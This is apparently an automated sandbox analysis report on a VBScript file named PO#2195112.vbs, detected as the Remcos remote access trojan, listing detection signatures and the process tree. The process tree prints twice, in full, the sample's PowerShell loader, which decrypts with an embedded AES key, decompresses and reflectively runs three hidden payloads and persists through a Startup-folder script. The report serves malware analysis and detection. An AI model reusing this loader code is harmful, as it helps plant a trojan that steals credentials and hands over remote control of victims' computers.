Windows
Analysis Report
PO#2195112.vbs
Overview
General Information
Detection
Remcos
Score | Range | Whitelisted | Confidence |
---|---|---|---|
100 | 0 - 100 | false | 100% |
Signatures
Multi AV Scanner detection for submitted file
Sigma detected: Drops script at startup location
Sigma detected: Remcos
VBScript performs obfuscated calls to suspicious functions
AI detected suspicious sample
Connects to many ports of the same IP (likely port scanning)
Installs a global keyboard hook
Maps a DLL or memory area into another process
Potential malicious VBS script found (has network functionality)
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: Suspicious Script Execution From Temp Folder
Sigma detected: WScript or CScript Dropper
Suspicious command line found
Suspicious execution chain found
Suspicious powershell command line found
Tries to harvest and steal browser information (history, passwords, etc)
Uses dynamic DNS services
Very long command line found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Wscript starts Powershell (via cmd or directly)
Yara detected WebBrowserPassView password recovery tool
Abnormal high CPU Usage
Contains functionality to read data from the clipboard
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Contains functionality to modify clipboard data
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Gzip Archive Decode Via PowerShell
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores files to the Windows start menu directory
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found; this is very uncommon (may be encrypted or packed)
Classification
- System is w10x64
  - wscript.exe (PID: 712, cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\PO#2195112.vbs", MD5: A47CBE969EA935BDD3AB568BB126BC80)
  - cmd.exe (PID: 3472, cmdline: "C:\Windows\System32\cmd.exe" /c C:\Users\user\AppData\Roaming\dropped.bat, MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
  - conhost.exe (PID: 4416, cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1, MD5: 0D698AF330FD17BEE3BF90011D49251D)
  - cmd.exe (PID: 4828, cmdline: C:\Windows\system32\cmd.exe /S /D /c" echo cls;powershell -w hidden;function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::FromBase64String('QipeuvuPHLjqQvGt9VT5aLclluvrXEdJm/QUWEGzhvQ='); $aes_var.IV=[System.Convert]::FromBase64String('K8KFKefFC/hhz69/oY9Vnw=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $cxhgH=New-Object System.IO.MemoryStream(,$param_var); $XWybH=New-Object System.IO.MemoryStream; $OXCUo=New-Object System.IO.Compression.GZipStream($cxhgH, [IO.Compression.CompressionMode]::Decompress); $OXCUo.CopyTo($XWybH); $OXCUo.Dispose(); $cxhgH.Dispose(); $XWybH.Dispose(); $XWybH.ToArray();}function execute_function($param_var,$param2_var){ $sMWNP=[System.Reflection.Assembly]::Load([byte[]]$param_var); $QqvvE=$sMWNP.EntryPoint; $QqvvE.Invoke($null, $param2_var);}$orZcJ = 'C:\Users\user\AppData\Roaming\dropped.bat';$host.UI.RawUI.WindowTitle = $orZcJ;$QZlmw=[System.IO.File]::ReadAllText($orZcJ).Split([Environment]::NewLine);foreach ($HiBel in $QZlmw) { if ($HiBel.StartsWith('gXFDerXikimqJOlowotV')) { $twZns=$HiBel.Substring(20); break; }}$payloads_var=[string[]]$twZns.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::FromBase64String($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::FromBase64String($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));$payload3_var=decompress_function (decrypt_function ([Convert]::FromBase64String($payloads_var[2].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var $null;execute_function $payload3_var (,[string[]] (''));", MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
  - powershell.exe (PID: 1484, cmdline: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe", MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
  - powershell.exe (PID: 6836, cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden, MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
  - powershell.exe (PID: 2432, cmdline: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /stext "C:\Users\user\AppData\Local\Temp\oaanp", MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
  - powershell.exe (PID: 6484, cmdline: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /stext "C:\Users\user\AppData\Local\Temp\oaanp", MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
  - powershell.exe (PID: 7072, cmdline: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /stext "C:\Users\user\AppData\Local\Temp\oaanp", MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
  - powershell.exe (PID: 6408, cmdline: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /stext "C:\Users\user\AppData\Local\Temp\qungqkxv", MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
  - powershell.exe (PID: 3984, cmdline: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /stext "C:\Users\user\AppData\Local\Temp\qungqkxv", MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
  - powershell.exe (PID: 3004, cmdline: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /stext "C:\Users\user\AppData\Local\Temp\bxtzrdixjge", MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
  - cmd.exe (PID: 2528, cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SC.cmd" ", MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
  - conhost.exe (PID: 6272, cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1, MD5: 0D698AF330FD17BEE3BF90011D49251D)
  - cmd.exe (PID: 4948, cmdline: C:\Windows\system32\cmd.exe /S /D /c" echo cls;powershell -w hidden;function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::FromBase64String('QipeuvuPHLjqQvGt9VT5aLclluvrXEdJm/QUWEGzhvQ='); $aes_var.IV=[System.Convert]::FromBase64String('K8KFKefFC/hhz69/oY9Vnw=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $cxhgH=New-Object System.IO.MemoryStream(,$param_var); $XWybH=New-Object System.IO.MemoryStream; $OXCUo=New-Object System.IO.Compression.GZipStream($cxhgH, [IO.Compression.CompressionMode]::Decompress); $OXCUo.CopyTo($XWybH); $OXCUo.Dispose(); $cxhgH.Dispose(); $XWybH.Dispose(); $XWybH.ToArray();}function execute_function($param_var,$param2_var){ $sMWNP=[System.Reflection.Assembly]::Load([byte[]]$param_var); $QqvvE=$sMWNP.EntryPoint; $QqvvE.Invoke($null, $param2_var);}$orZcJ = 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SC.cmd';$host.UI.RawUI.WindowTitle = $orZcJ;$QZlmw=[System.IO.File]::ReadAllText($orZcJ).Split([Environment]::NewLine);foreach ($HiBel in $QZlmw) { if ($HiBel.StartsWith('gXFDerXikimqJOlowotV')) { $twZns=$HiBel.Substring(20); break; }}$payloads_var=[string[]]$twZns.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::FromBase64String($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::FromBase64String($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));$payload3_var=decompress_function (decrypt_function ([Convert]::FromBase64String($payloads_var[2].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var $null;execute_function $payload3_var (,[string[]] (''));", MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
  - powershell.exe (PID: 6184, cmdline: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe", MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
  - powershell.exe (PID: 5112, cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden, MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
- cleanup
Name | Description | Attribution | Blogpost URLs | Link |
---|---|---|---|---|
Remcos, RemcosRAT | Remcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers. Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns. Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user. Remcos is developed by the cybersecurity company BreakingSecurity. | | | |
No configs have been found.
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_WebBrowserPassView | Yara detected WebBrowserPassView password recovery tool | Joe Security | |
System Summary |
---|
Source: | Author: Florian Roth (Nextron Systems) |